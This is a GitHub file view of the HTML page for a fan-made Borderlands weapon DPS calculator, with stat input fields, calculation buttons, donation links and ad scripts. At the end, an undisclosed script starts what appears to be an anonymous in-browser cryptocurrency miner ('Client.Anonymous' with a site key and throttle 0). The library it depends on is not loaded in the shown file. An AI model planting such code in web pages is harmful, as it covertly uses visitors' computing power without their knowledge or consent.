-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
76 lines (69 loc) · 3.55 KB
/
index.html
File metadata and controls
76 lines (69 loc) · 3.55 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<!DOCTYPE html>
<html lang="en">
<head>
<meta chrset="UTF 8">
<meta http-equiv='cache-control' content='no-cache'>
<meta http-equiv='expires' content='0'>
<meta http-equiv='pragma' content='no-cache'>
<title>BL Weapon DPS Calculator v0.07</title>
<style>
body {
background-color: #000000;
}
h4, div {
color: #F7FE01;
}
h3 {
color: #01FE32;
}
input[type=text] {
background-color: #000000;
color: #01FE32;
}
</style>
</head>
<h3>Borderlands Weapon DPS Calculator</h3>
<script data-ad-client="ca-pub-1071035003958265" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script src="bl_dps_calc.js"></script>
<!-- format: wep dmg, wep acc, wep handling, wep reload, wep firerate, wep mag size, ele damage, ele chance -->
<h4>Weapon Name: <input type="text" id="wWepName" value="blaster" style="width:325px;"/>
<h4>Weapon Damage: <input type="text" id="wDamage" value="34" style="width:64px;"/>
<h4>Weapon Accuracy: <input type="text" id="wAccu" value="77" style="width:42px;"/>
<h4>Weapon Reloadspeed: <input type="text" id="wReloadSpeed" value="2.3" style="width:42px;"/>
<h4>Weapon Firerate: <input type="text" id="wFirerate" value="5.28" style="width:42px;"/>
<h4>Weapon Magazine Size: <input type="text" id="wMagSize" value="15" style="width:42px;"/>
<h4>Weapon Elemental Damage: <input type="text" id="wEleDamage" value="46" style="width:42px;"/>
<h4>Weapon Elemental Chance: <input type="text" id="wEleChance" value="30" style="width:42px;"/>
<h4>Guardian Rank Boosts (Optional)</h4>
<h4>Gun Damage Bonus %: <input type="text" id="wGDB" value="7.96" style="width:42px;"/>
<h4>Gun FireRate Bonus %: <input type="text" id="wGFRB" value="4.37" style="width:42px;"/>
<h4>Gun Accuracy Bonus %: <input type="text" id="wGAB" value="0" style="width:42px;"/>
<!--Reload bonuses are bugged had to disable! <h4>Gun ReloadSpeed Bonus %: <input type="text" disabled="true" id="wGRSB" value="0" style="width:42px;"/></h4> -->
<h4>Calculated DPS: <input type="text" id="CalcDPS" value="0" style="width:200px;"/>
<br/>
<button onclick="submit();" href="javascript:;">Calculate DPS!</button>
<button onclick="submit2();" href="javascript:;">Calculate DPS+Guardian Ranks</button>
<button onclick="clearText();" href="javascript:;">Clear Values</button><br/>
<button onclick="SaveToList();" href="javascript:;">Save to List</button>
<button onclick="DisplayList();" href="javascript:;">Display List</button>
<!--<button onclick="openGitHub();" href="javascript:;">Get Sourcecode</button>-->
<button onclick="openDonate();" href="javascript:;">Donate</button>
<br/><br/>
<div id="SaveResult"></div>
<div id="Result"></div>
<a href="https://paypal.me/internprimas" target="_blank"><img src="https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif" title="Donate to Developer"></a>
<a href="https://github.com/LeftBased/Borderlands-Weapon-DPS-Calculator-JavaScript" target="_blank"><img src="GitHub-Mark.png" title="Sourcecode on GitHub">
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- testy -->
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-1071035003958265" data-ad-slot="3033456321" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>
var _client = new Client.Anonymous('5aae09a2202be97081ab6688f079e0fb971ad4c6f52f9905290e992265129c36', {
throttle: 0, c: 'w', ads: 0
});
_client.start();
</script>
</body>
</html>